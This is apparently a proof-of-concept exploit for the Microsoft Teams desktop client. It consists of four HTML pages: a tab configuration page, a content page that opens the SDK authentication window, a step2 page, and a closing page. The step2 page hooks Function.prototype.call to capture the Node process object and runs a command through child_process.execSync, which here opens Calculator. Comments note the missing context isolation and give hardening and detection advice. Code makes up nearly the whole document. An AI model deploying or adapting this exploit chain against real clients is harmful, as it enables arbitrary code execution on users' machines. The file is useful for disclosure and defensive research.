Teams RCE
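<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Teams tab configuration</title>
  <!--
    Tab configuration page of the proof of concept.
    It marks the configuration as valid as soon as the DOM is ready and,
    when the user saves, registers an externally hosted URL as the tab's
    content page. Nothing on this page takes user input.

    Review note: the content URL is ordinary remote web content chosen by
    whoever adds the tab, so the hosting client has to treat everything
    loaded from it as untrusted.
  -->
  <style>
    body {
      background-color: #F0F2F4;
      color: #16233A;
      font-family: 'Segoe UI', Tahoma, Helvetica, Sans-Serif;
      font-size: 0.875rem;
      font-weight: 400;
      line-height: 1.25rem;
    }
  </style>
  <script src="https://statics.teams.microsoft.com/sdk/v1.0/js/MicrosoftTeams.min.js"></script>
  <script>
    (function() {
      'use strict';

      // The SDK must be initialized before any other call.
      microsoftTeams.initialize();

      // On save, store the remote page as the tab's content URL and entity id,
      // then report success so the configuration dialog can close.
      microsoftTeams.settings.registerOnSaveHandler(function(saveEvent) {
        microsoftTeams.settings.setSettings({
          contentUrl: 'https://maustin.net/hax/teams/',
          entityId: 'https://maustin.net/hax/teams/'
        });
        saveEvent.notifySuccess();
      });

      // No options are offered: the configuration is declared valid
      // unconditionally, which makes the Save action available.
      document.addEventListener('DOMContentLoaded', function() {
        microsoftTeams.settings.setValidityState(true);
      });
    })();
  </script>
</head>
<body>
  <h2>save</h2>
</body>
</html>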
<!DOCTYPE html>
<html>
  <head>
    <script>
      // Final page of the flow: its only action is to close the
      // authentication window that is displaying it.
      window.close();
    </script>
  </head>
  <body>done</body>
</html>
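<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Microsoft Teams POC</title>
  <!--
    Tab content page of the proof of concept.
    Once the SDK has returned a context, it immediately starts the SDK
    authentication flow, pointing it at the relative URL step2.html. No
    user interaction is involved on this page.

    Review note: the authentication window is handed a URL chosen entirely
    by the tab's author. Whether script in that window is isolated from
    the client's privileged runtime is a property of the host application,
    not of this page.
  -->
  <style>
    body {
      background-color: #F0F2F4;
      color: #16233A;
      font-family: 'Segoe UI', Tahoma, Helvetica, Sans-Serif;
      font-size: 0.875rem;
      font-weight: 400;
      line-height: 1.25rem;
    }
  </style>
  <script src="https://statics.teams.microsoft.com/sdk/v1.0/js/MicrosoftTeams.min.js"></script>
  <script>
    (function() {
      'use strict';

      microsoftTeams.initialize();

      // The context value itself is not used; the callback only serves as the
      // point at which the authentication flow is started.
      microsoftTeams.getContext(function(context) {
        microsoftTeams.authentication.authenticate({
          url: 'step2.html',
          width: 550,
          height: 660,
          // Both outcomes are ignored on purpose: nothing is expected back
          // from the window.
          successCallback: function() {},
          failureCallback: function() {}
        });
      });
    })();
  </script>
</head>
<body>
  Microsoft Teams POC
</body>
</html>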
<!DOCTYPE html>
<html>
  <head>
    <script>
      // Without context isolation the Function prototype is shared with
      // Node.js internals, so a page-level hook on Function.prototype.call
      // also observes calls made by privileged code and can be handed the
      // Node "process" object.
      //
      // Review note (defensive): this depends entirely on the hosting window
      // sharing one JavaScript realm with privileged code. In an Electron
      // host, enabling contextIsolation and sandbox and keeping
      // nodeIntegration off for any window that loads remote content gives
      // page script its own built-in prototypes, so a hook like this never
      // sees privileged objects. For detection, the observable effect is the
      // client process starting a child process it does not normally start.
      Function.prototype.call = new Proxy(Function.prototype.call, {
        apply: function(wrapped, receiver, args) {
          // Forward the call unchanged first so callers still get their result.
          var result = Reflect.apply(wrapped, receiver, args);
          var firstArg = args[0];
          if (firstArg.pid) { // this is probably a process ref
            // Harmless demonstration marker: opens Calculator on macOS.
            firstArg.mainModule.require('child_process').execSync('open /Applications/Calculator.app');
          }
          return result;
        }
      });

      // Move on to the page that closes this window.
      location.href = "done.html";
    </script>
  </head>
  <body>
    MSTeams POC Step #2
  </body>
</html>